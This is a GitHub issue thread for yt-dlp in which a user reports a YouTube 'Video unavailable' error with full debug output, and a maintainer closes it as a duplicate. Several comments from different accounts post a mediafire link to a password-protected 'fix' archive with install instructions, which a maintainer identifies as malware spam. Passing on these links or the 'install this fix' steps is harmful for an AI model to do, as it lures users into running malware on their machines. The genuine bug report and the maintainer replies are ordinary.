### ISSUE TITLE
Bugging when downloading from YouTube

### ISSUE THREAD

**Issue by BarnameESF** [yt-dlp/yt-dlp#10863] opened 2024-08-28 07:26 UTC
### DO NOT REMOVE OR SKIP THE ISSUE TEMPLATE

- [X] I understand that I will be **blocked** if I *intentionally* remove or skip any mandatory\* field

### Checklist

- [X] I'm reporting that yt-dlp is broken on a **supported** site
- [X] I've verified that I have **updated yt-dlp to nightly or master** ([update instructions](https://github.com/yt-dlp/yt-dlp#update-channels))
- [X] I've checked that all provided URLs are playable in a browser with the same IP and same login details
- [X] I've checked that all URLs and arguments with special characters are [properly quoted or escaped](https://github.com/yt-dlp/yt-dlp/wiki/FAQ#video-url-contains-an-ampersand--and-im-getting-some-strange-output-1-2839-or-v-is-not-recognized-as-an-internal-or-external-command)
- [X] I've searched [known issues](https://github.com/yt-dlp/yt-dlp/issues/3766) and the [bugtracker](https://github.com/yt-dlp/yt-dlp/issues?q=) for similar issues **including closed ones**. DO NOT post duplicates
- [X] I've read the [guidelines for opening an issue](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#opening-an-issue)
- [X] I've read about [sharing account credentials](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#are-you-willing-to-share-account-details-if-needed) and I'm willing to share it if required

### Region

Germany

### Provide a description that is worded well enough to be understood

I use the cookie file sending method, but unfortunately it gives an error in the middle of the process. This error occurred a few hours ago and it was healthy before. Of course, I also updated the cookie file, but it still had a problem.

### Provide verbose output that clearly demonstrates the problem

- [X] Run **your** yt-dlp command with **-vU** flag added (`yt-dlp -vU <your command line>`)
- [X] If using API, add `'verbose': True` to `YoutubeDL` params instead
- [X] Copy the WHOLE output (starting with `[debug] Command-line config`) and insert it below

### Complete Verbose Output

```shell
[debug] Encodings: locale UTF-8, fs utf-8, pref UTF-8, out utf-8, error utf-8, screen utf-8
[debug] yt-dlp version nightly@2024.08.26.232811 from yt-dlp/yt-dlp-nightly-builds [41be32e78] (pip) API
[debug] params: {'ratelimit': 52428800, 'cookiefile': '/root/player2/cookies/youtube/T2/N1.txt', 'verbose': True, 'ignoreerrors': True, 'format': 'bestaudio*[ext=m4a]/bestaudio/best', 'outtmpl': '/root/player2/downloads/TakPlay/youtube_jlKO6s3ERfo_bestaudio.%(ext)s', 'compat_opts': set(), 'http_headers': {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-us,en;q=0.5', 'Sec-Fetch-Mode': 'navigate'}}
[debug] Python 3.9.19 (CPython x86_64 64bit) - Linux-4.18.0-477.21.1.lve.1.el8.x86_64-x86_64-with-glibc2.28 (OpenSSL 1.1.1k  FIPS 25 Mar 2021, glibc 2.28)
[debug] exe versions: ffmpeg 4.2.9, ffprobe 4.2.9
[debug] Optional libraries: Cryptodome-broken, brotli-1.1.0, certifi-2024.02.02, mutagen-1.47.0, requests-2.32.3, sqlite3-3.26.0, urllib3-1.26.18, websockets-10.4
[debug] Proxy map: {}
[debug] Request Handlers: urllib, requests
[debug] Loaded 1831 extractors
[youtube] Extracting URL: https://www.youtube.com/watch?v=jlKO6s3ERfo
[youtube] jlKO6s3ERfo: Downloading webpage
[debug] [youtube] Extracted SAPISID cookie
[youtube] jlKO6s3ERfo: Downloading ios player API JSON
[youtube] jlKO6s3ERfo: Downloading web creator player API JSON
ERROR: [youtube] jlKO6s3ERfo: Video unavailable. This content isn’t available.
  File "/usr/local/lib/python3.9/site-packages/yt_dlp/extractor/common.py", line 740, in extract
    ie_result = self._real_extract(url)
  File "/usr/local/lib/python3.9/site-packages/yt_dlp/extractor/youtube.py", line 4366, in _real_extract
    self.raise_no_formats(reason, expected=True)
  File "/usr/local/lib/python3.9/site-packages/yt_dlp/extractor/common.py", line 1263, in raise_no_formats
    raise ExtractorError(msg, expected=expected, video_id=video_id)
```

**Comment by bkballoon** [comment] 2024-08-28 07:27
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bashonly** [comment] 2024-08-28 07:27
Do not follow the spam link above, it is malware

**Comment by qiliq** [comment] 2024-08-28 07:42
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by qiliq** [comment] 2024-08-28 07:43
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NEKO-JOJUK** [comment] 2024-08-28 07:45
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment] 2024-08-28 07:47
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by qiliq** [comment] 2024-08-28 07:48
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by DTrombett** [comment] 2024-08-28 09:15
The `Video unavailable. This content isn’t available.` error usually means that you're account got blocked by YouTube

**Comment by bashonly** [comment] 2024-08-28 15:56
Duplicate of #10085

**Closed by bashonly** 2024-08-28 15:56 UTC
Labels: site-bug, triage
